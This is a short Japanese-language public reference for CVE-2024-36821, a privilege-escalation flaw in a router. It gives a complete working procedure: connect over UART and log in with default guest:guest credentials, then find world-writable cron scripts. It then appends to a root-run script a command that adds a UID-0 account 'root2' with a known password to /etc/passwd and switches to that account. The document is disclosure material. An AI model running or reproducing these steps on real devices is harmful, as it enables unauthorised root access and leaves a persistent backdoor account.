
CVE-2024-36821 が対象とする脆弱性の必要最小限の情報を含む公開リファレンス
CVE-2024-36821 で扱われる脆弱性に必要な最小限の情報を含む公開リファレンスです。
UART 接続でルーターに接続する
guest:guest の資格情報を使用してシステムにログインする
find / -perm -777 -type f 2>/dev/null コマンドを使用して、読み取り・書き込み・実行権限を持つファイルを探す:
1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
5. /tmp/cron/cron.everyminute/conntrack_collector.sh
ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh コマンドで所有者を確認する
openssl passwd Abracadabra コマンドでパスワードを生成する
/tmp/cron/cron.everyminute/conntrack_collector.sh を編集し、末尾に生成した新しいパスワードを追加する:
echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
1分待つ
次のコマンドでユーザーを root2 に切り替える
/ $ su root2
Password: Abracadabra
~ #